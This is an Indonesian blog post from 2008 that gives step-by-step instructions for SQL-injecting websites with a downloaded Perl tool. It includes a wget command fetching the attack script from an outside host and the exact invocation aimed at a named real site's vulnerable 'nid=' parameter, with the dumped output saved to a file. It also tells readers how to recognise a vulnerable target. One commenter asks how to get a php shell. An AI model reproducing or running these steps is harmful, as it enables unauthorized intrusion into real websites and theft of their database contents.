14 Sep 2008

Perl SQL Injection

Login ke shell kita

Download batmansql.txt di http://www.tongseng.com/batmansql.txt

ketik: wget http://www.tongseng.com/batmansql.txt

Ubah nama file menjadi batmansql.pl

ketik: mv batmansql.txt batmansql.pl

Jalankan dgn perintah:









(klik gambar untuk memperbesar)

perl batmansql.pl(spasi)target(spasi)jumlah kolom yg mau dicek(spasi)namafileoutput

Contoh target yg sudah terbukti bisa diinject: www.akaclan.com

Karena syarat web target hrs mengandung "id=", maka kita gunakan link:

http://www.akaclan.com/news-article.php?nid=

Mulai inject:

- Ketik perl perl batmansql.pl http://www.akaclan.com/news-article.php?nid= 50 batman01.txt -- -T -C




















(klik gambar untuk memperbesar)

Hasil injeksi akan disave ke file batman01.txt

Ciri-ciri website/forum yang bisa diinject:
Muncul tulisan:
[!] Checking if the website is vulnerable...
[+] Vulnerable website, script continues...

Jika muncul keterangan seperti itu, berarti website tsb bisa kita inject SQL-nya :)

Labels:

2 komentar:

Han said...

Keren wid.wah gelar nya tambah wid. Pak dokter. Hehe

15.9.08
Chapzha said...

Bozz php shellny gimana bozz ????

2.10.08

Post a Comment

Subscribe to: Post Comments (Atom)


My blog is worth $13,548.96.
How much is your blog worth?

Sponsored by:

www.hostingimpian.com - Hosting Murah

www.pusatbelanja.com - Belanja Barang Luar Negeri

www.hiwhiw.com - Freeware

www.ica.cc - Lifestyle Blog

(Your link here for just $5/month. Paypal & Moneybooker)